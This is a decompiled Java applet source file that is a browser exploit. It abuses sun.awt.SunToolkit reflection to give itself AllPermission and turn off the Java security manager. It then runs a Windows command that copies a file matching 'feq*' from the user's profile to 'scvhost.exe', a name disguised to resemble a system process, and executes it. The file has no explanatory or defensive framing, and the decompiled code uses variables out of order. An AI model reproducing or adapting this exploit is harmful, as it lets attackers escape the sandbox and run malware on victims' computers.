import java.applet.Applet; import java.awt.Graphics; import java.beans.Expression; import java.beans.Statement; import java.lang.reflect.Field; import java.net.URL; import java.security.AllPermission; import java.security.CodeSource; import java.security.Permissions; import java.security.ProtectionDomain; import java.security.PermissionCollection; import java.security.cert.Certificate; import java.security.AccessControlContext; public class subway extends Applet { public subway() { try{ localObject1 = this; Statement localStatement1 = new Statement(System.class, "setSecurityManager", new Object[] { null }); (localObject2 = new Permissions()).add(new AllPermission()); Object localObject2 = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), (PermissionCollection)localObject2); localObject2 = new AccessControlContext(new ProtectionDomain[] { localObject2 }); Object localObject4 = localObject2; Statement localStatement2 = localStatement1; Object localObject3 = "acc"; localObject2 = Statement.class; localObject1 = localObject1; (localObject1 = new Object[2])[0] = localObject2; localObject1[1] = localObject3; localObject2 = "sun.awt.SunToolkit"; (localObject3 = new Object[1])[0] = localObject2; (localObject2 = new Expression(Class.class, "forName", localObject3)).execute(); (localObject1 = new Expression((Class) ((Expression)localObject2).getValue(), "getField", localObject1)).execute(); ((Field)((Expression)localObject1).getValue()).set(localStatement2, localObject4); localStatement1.execute(); Runtime.getRuntime().exec("CMD /C FOR /R \"%USERPROFILE%\\\" %i IN (feq*) DO copy \"%i\" \"%USERPROFILE%\\scvhost.exe\"&cmd /c \"%USERPROFILE%\\scvhost.exe\""); return; } catch (Throwable localThrowable){ Object localObject1; (localObject1 = localThrowable).printStackTrace(); } } public void paint(Graphics paramGraphics) { paramGraphics.drawString("", 10, 10); }}